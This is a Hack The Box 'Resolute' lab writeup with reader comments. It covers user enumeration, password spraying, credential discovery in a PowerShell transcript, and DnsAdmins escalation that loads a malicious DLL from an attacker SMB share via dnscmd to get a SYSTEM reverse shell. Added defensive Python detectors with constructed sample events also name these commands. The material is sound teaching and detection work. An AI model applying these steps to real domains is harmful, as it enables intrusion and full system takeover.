Hack The Box Resolute Writeup – 10.10.10.169

Hack The Box Resolute is the second Windows machine I have owned in less than 10 days. Last week I owned Control and published its writeup on my blog yesterday, and today I am very happily posting my second Windows machine writeup. TBH, I love working on Windows machines more than Linux ones; yes, that is weird compared to my fellow infosec pros.

Let us start.

Btw, I think getting user on this machine is one of the easiest tasks I have ever had on HTB.

Like the previous Windows-based machine, I added the IP 10.10.10.169 to my /etc/hosts as resolute.htb and proceeded to a port scan using nmap.

NMAP SCAN RESULTS

Since the machine is Windows and I had a similar experience with the Forest machine (writeup here) a few days ago, I decided to use enum4linux to gather more information about the domain, DNS, users and other details.

ENUM4LINUX SCAN RESULTS

I now have a handful of information about the Resolute box: the workgroup name, the security and password complexity policy, the security groups, the list of users and their roles, and the clear-text password of a user.

GETTING USER

Let us query the SMB service using the rpcclient tool. Before that, let us gather some more information about the user Marko, whose password we have in clear text from the enum4linux scan.

I tried to run Evil-WinRM using Marko's credentials, but it didn't work, so I guessed that Marko doesn't have access to the system or his account is locked out. I decided to try the same password against the rest of the users, and the password Welcome123! worked for Melanie.
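From the defender's side, what happened above (one password tried against every account until it works) leaves a very recognisable trace in the domain controller's logon events: a burst of failed logons for many different accounts from one source, followed by a success. The script below is an added example, not part of the writeup, and runs over constructed sample events in a simplified "timestamp,event_id,account,source_ip" form rather than real event-log output; the account names other than marko, ryan and melanie are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logon events (not real event-log output), reduced to
# "timestamp,event_id,account,source_ip". 4625 = failed logon, 4624 = successful logon.
# 10.10.14.21 tries one password across many accounts and finally lands on melanie;
# 10.10.10.50 is a user mistyping her own password twice, which must not be flagged.
SAMPLE_EVENTS = """\
2019-12-03T06:30:01,4625,marko,10.10.14.21
2019-12-03T06:30:02,4625,ryan,10.10.14.21
2019-12-03T06:30:03,4625,alice,10.10.14.21
2019-12-03T06:30:04,4625,bob,10.10.14.21
2019-12-03T06:30:05,4625,carol,10.10.14.21
2019-12-03T06:30:06,4625,dave,10.10.14.21
2019-12-03T06:30:07,4624,melanie,10.10.14.21
2019-12-03T06:31:00,4625,erin,10.10.10.50
2019-12-03T06:31:10,4625,erin,10.10.10.50
2019-12-03T06:32:00,4624,erin,10.10.10.50
"""


def parse_events(text):
    """Parse the simplified CSV form above into dicts carrying a datetime."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, event_id, user, src = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "id": int(event_id),
                       "user": user.lower(), "src": src})
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag each source that fails logons for at least `min_users` distinct accounts
    inside one `window`, and report which accounts then logged on successfully
    from that source: those are the accounts whose password was guessed."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(failures):
            in_window = [e for e in failures[i:] if e["time"] - first["time"] <= window]
            users = {e["user"] for e in in_window}
            if len(users) < min_users:
                continue
            end = in_window[-1]["time"] + window
            successes = sorted({e["user"] for e in evs
                                if e["id"] == 4624 and first["time"] <= e["time"] <= end})
            findings[src] = {"distinct_failed_users": sorted(users),
                             "success_after_spray": successes}
            break  # one finding per source is enough to raise an alert
    return findings


if __name__ == "__main__":
    for src, f in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"{src}: {len(f['distinct_failed_users'])} accounts sprayed, "
              f"then success as {f['success_after_spray']}")
```

The threshold of five distinct accounts in five minutes is an assumption for the sample; on a real DC the numbers are tuned against the baseline of normal failed logons, and the same check is worth running over NTLM and Kerberos pre-authentication failures separately, since a spray may only show up in one of them.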

PRIVILEGE ESCALATION

The HTB forum is always helpful; I get a lot of good nudges over there. One of the users left a hint to -Force the root of the user's profile, so I did ;). Btw, the -Force switch (on Get-ChildItem) shows hidden directories.

I noticed the directory "PSTranscripts" and went on to find out what is inside. It contains a folder "20191203", and inside that a text file called "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt", which is a PowerShell transcript. I used type to read the file; here is the full transcript.

The transcript is a jackpot for me: I found a lot of useful information, including the user Ryan (probably a system administrator), a link to backups, system file locations, etc.
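Both finds so far are the same hygiene problem seen twice: a password left in a place the domain happily hands out to anyone who asks (the enum4linux output earlier, and now a PowerShell transcript readable by a low-privileged user). The scanner below is an added example, not the writeup's code, that an administrator could run over exported user descriptions and over the PSTranscripts directory to catch such leaks before someone else does. It assumes the enum4linux password sat in the account's description attribute (the writeup only says enum4linux showed it), and all sample inputs are constructed; the transcript lines are not the box's real transcript, and the ConstructedPass values are placeholders.

```python
import re

# Constructed sample inputs (not the box's real data): user description fields of the
# kind enum4linux lists, and a few lines in the style of a PowerShell transcript.
SAMPLE_USER_DESCRIPTIONS = {
    "marko": "Account created. Password set to Welcome123!",
    "melanie": "Finance team",
    "ryan": "Backup admin, see ticket 4412",
}
SAMPLE_TRANSCRIPT = """\
Windows PowerShell transcript start (constructed sample, not the box's real transcript)
Username: MEGABANK\\ryan
PS> cmd /c net use X: \\\\fs01\\backups ryan ConstructedPass!23
PS> $s = ConvertTo-SecureString 'ConstructedPass!24' -AsPlainText -Force
PS> Get-ChildItem X:\\
"""

# Heuristics: "password set to X" / "pwd: X", a plain-text SecureString literal, and
# positional credentials on a "net use" command line.
PASSWORD_KEYWORD = re.compile(r"(?i)\bpass(?:word|wd|phrase)?\b\s*(?:set to|is|[:=])\s*(\S+)")
SECURESTRING = re.compile(r'(?i)ConvertTo-SecureString\s+[\'"]([^\'"]+)[\'"].*-AsPlainText')
NET_USE = re.compile(r"(?i)\bnet\s+use\b(.*)$")


def redact(secret):
    """Keep the first two characters so a finding can be matched to the right line
    without copying the secret into the report."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def net_use_candidate(line):
    """Return the last positional token of a 'net use' command that is neither the
    drive letter, the \\\\server\\share path, a /switch nor '*' (prompt): that is
    where 'net use' takes a password."""
    m = NET_USE.search(line)
    if not m:
        return None
    positional = [t for t in m.group(1).split()
                  if not t.startswith("/") and not t.startswith("\\\\")
                  and not re.fullmatch(r"[A-Za-z]:", t) and t != "*"]
    return positional[-1] if positional else None


def scan_text(text, source):
    """Scan text line by line; each finding is (source, line_no, rule, redacted secret)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = PASSWORD_KEYWORD.search(line)
        if m:
            findings.append((source, n, "password-keyword", redact(m.group(1))))
        m = SECURESTRING.search(line)
        if m:
            findings.append((source, n, "securestring-plaintext", redact(m.group(1))))
        cand = net_use_candidate(line)
        if cand:
            findings.append((source, n, "net-use-inline-credential", redact(cand)))
    return findings


def scan_user_descriptions(descriptions):
    """Apply the same rules to each account's description attribute."""
    findings = []
    for user, desc in descriptions.items():
        findings.extend(scan_text(desc, f"ad-description:{user}"))
    return findings


if __name__ == "__main__":
    for f in scan_user_descriptions(SAMPLE_USER_DESCRIPTIONS) + scan_text(SAMPLE_TRANSCRIPT, "transcript"):
        print(f)
```

The rules are deliberately loose (a sentence like "password is reset monthly" will trigger the first one), which is the right trade-off for an audit where a human reviews the hits. For transcripts the more important fix is the one the finding points at: transcript directories should not be readable by ordinary users, and credentials should never be passed on a command line in the first place.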

I'm going to use Evil-WinRM again to log in as Ryan.

I’m in the system as Ryan.

Let us see what Ryan has access to:

The group enumeration shows that Ryan belongs to the MEGABANK\DnsAdmins group, which we can use to run commands as Administrator from our current user, Ryan.

A member of DnsAdmins is effectively a full-privileged administrator of the DNS server: the DNS service runs as SYSTEM and DnsAdmins can change its configuration, so a user with DnsAdmins group membership can run any command or task as Administrator.

So we can create an executable file like nc.exe or a DLL file to get a reverse connection. I decided to set up an SMB share and serve our nc.exe together with a malicious DLL built with msfvenom.

CREATE A MALICIOUS PAYLOAD

RUN AN SMB SHARE

START THE LISTENER

RUN DNS COMMAND (from Resolute)

dnscmd in Windows is a command-line utility for managing DNS servers. It is useful in scripting batch files to help automate routine DNS management tasks or to perform simple unattended setup and configuration of new DNS servers on a network. Ref

Here I'm going to use dnscmd to set the server-level plugin DLL to the malicious DLL on my SMB share. The first command, "dnscmd resolute /config /serverlevelplugindll \\10.10.14.21\resolute\nav1n.dll", sets the ServerLevelPluginDll registry value to point at our DLL.

The second and third commands, "sc.exe \\resolute stop dns" and "sc.exe \\resolute start dns", stop and start the DNS server. When the DNS server restarts it loads the DLL configured in ServerLevelPluginDll, executing our code, and my listener gets a reverse shell as SYSTEM.
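Every step of that chain is loud if anyone is listening for it: a dnscmd command line carrying /serverlevelplugindll, the ServerLevelPluginDll value being written under the DNS service's Parameters key (HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, which is where this setting lives), and a DNS service restart by the same user right afterwards. The detection below is an added example written for the blue team, not code from the writeup; it runs over constructed sample telemetry in simplified dict form rather than real Sysmon or 4688 records, and the svc_dnsadmin account doing a legitimate zone change is made up for contrast. The host, user and paths are the writeup's own.

```python
import re

# Constructed sample telemetry (not real Sysmon or 4688 records), simplified to dicts.
# "process" = a process-creation event with its command line; "registry" = a
# registry value being set. svc_dnsadmin is a constructed account doing routine
# DNS work that must not be flagged.
SAMPLE_EVENTS = [
    {"type": "process", "host": "RESOLUTE", "user": "MEGABANK\\ryan",
     "cmd": r"dnscmd resolute /config /serverlevelplugindll \\10.10.14.21\resolute\nav1n.dll"},
    {"type": "process", "host": "RESOLUTE", "user": "MEGABANK\\ryan",
     "cmd": r"sc.exe \\resolute stop dns"},
    {"type": "process", "host": "RESOLUTE", "user": "MEGABANK\\ryan",
     "cmd": r"sc.exe \\resolute start dns"},
    {"type": "process", "host": "RESOLUTE", "user": "MEGABANK\\svc_dnsadmin",
     "cmd": "dnscmd /zoneadd example.local /primary /file example.local.dns"},
    {"type": "registry", "host": "RESOLUTE", "user": "NT AUTHORITY\\SYSTEM",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters",
     "value": "ServerLevelPluginDll",
     "data": r"\\10.10.14.21\resolute\nav1n.dll"},
]

PLUGIN_SWITCH = re.compile(r"(?i)/serverlevelplugindll\s+(\S+)")
DNS_RESTART = re.compile(
    r"(?i)\b(?:sc(?:\.exe)?\s+(?:\\\\\S+\s+)?(?:stop|start)\s+dns|net\s+(?:stop|start)\s+dns)\b")
DNS_PARAMS_KEY = re.compile(r"(?i)\\Services\\DNS\\Parameters$")


def classify_plugin_path(path):
    """Rough risk class for a ServerLevelPluginDll value. Empty is the normal state;
    a UNC path means the DNS service (running as SYSTEM) will load code from another
    host; anything outside System32 is at least unusual. Even a System32 path should
    be checked against a known-good list before being trusted."""
    if not path:
        return "clear"
    if path.startswith("\\\\"):
        return "remote-unc"
    if not path.lower().startswith("c:\\windows\\system32\\"):
        return "non-system-path"
    return "system-path"


def detect(events):
    """Walk events in order and alert on the plugin-DLL change, on a DNS service
    restart by the same user on the same host afterwards (the step that makes the
    DLL load), and on the registry value itself being written."""
    alerts = []
    changed_by = set()  # (host, user) pairs that set the plugin DLL
    for i, e in enumerate(events):
        if e["type"] == "process":
            m = PLUGIN_SWITCH.search(e["cmd"])
            if m:
                alerts.append({"rule": "dnscmd-serverlevelplugindll", "index": i,
                               "host": e["host"], "user": e["user"],
                               "path_class": classify_plugin_path(m.group(1))})
                changed_by.add((e["host"], e["user"]))
            elif DNS_RESTART.search(e["cmd"]) and (e["host"], e["user"]) in changed_by:
                alerts.append({"rule": "dns-restart-after-plugin-change", "index": i,
                               "host": e["host"], "user": e["user"], "path_class": None})
        elif (e["type"] == "registry" and DNS_PARAMS_KEY.search(e["key"])
              and e["value"].lower() == "serverlevelplugindll"):
            alerts.append({"rule": "registry-serverlevelplugindll-set", "index": i,
                           "host": e["host"], "user": e["user"],
                           "path_class": classify_plugin_path(e["data"])})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["rule"], a["host"], a["user"], a["path_class"])
```

The registry rule is the one to keep even if command-line logging is incomplete, because the value can be set by other means than dnscmd. Beyond detection, the mitigation is to treat DnsAdmins as a tier-0 group: audit its membership, and keep the ServerLevelPluginDll value empty and under monitoring on every DNS server.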

REVERSE CONNECTION AS SYSTEM

Thank you for reading, hope you enjoyed it.

Navin

Hey there, I'm Navin, a passionate infosec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug bounty. If you are an HTB user and like my articles, please respect here: https://www.hackthebox.eu/home/users/profile/68523

10 Comments
vbscrub
5 months ago

Interesting to see how you went about the DNS priv esc. I didn’t think of doing it that way. I just wrote a legit DNS plugin DLL that had my own code in it to read the flag from the admin desktop and write it out to a file I could read from Powershell. I thought if the DLL was not a legit DNS plugin with exports like DnsPluginInitialize then it is meant to stop the DNS Server service from starting, so I’m surprised your method worked. Maybe I’m misunderstanding and you did do that as well. PS you’re not…

nando
4 months ago

Hey

When you started the listener, the port should be 4444, the same one the venom payload is calling back to, no?

I rooted the easy way, with psexec in Metasploit.

allure
4 months ago

This might be a really off-topic question, but what terminal is that? Kinda making me curious haha.

Jaime
3 months ago

When you restart the DC you need to type a command like “sc.exe stop dns”.
Why is the FQDN of this DC “resolute” and not “resolute.megabank.local”?
I’m really confused about that. Please tell me.
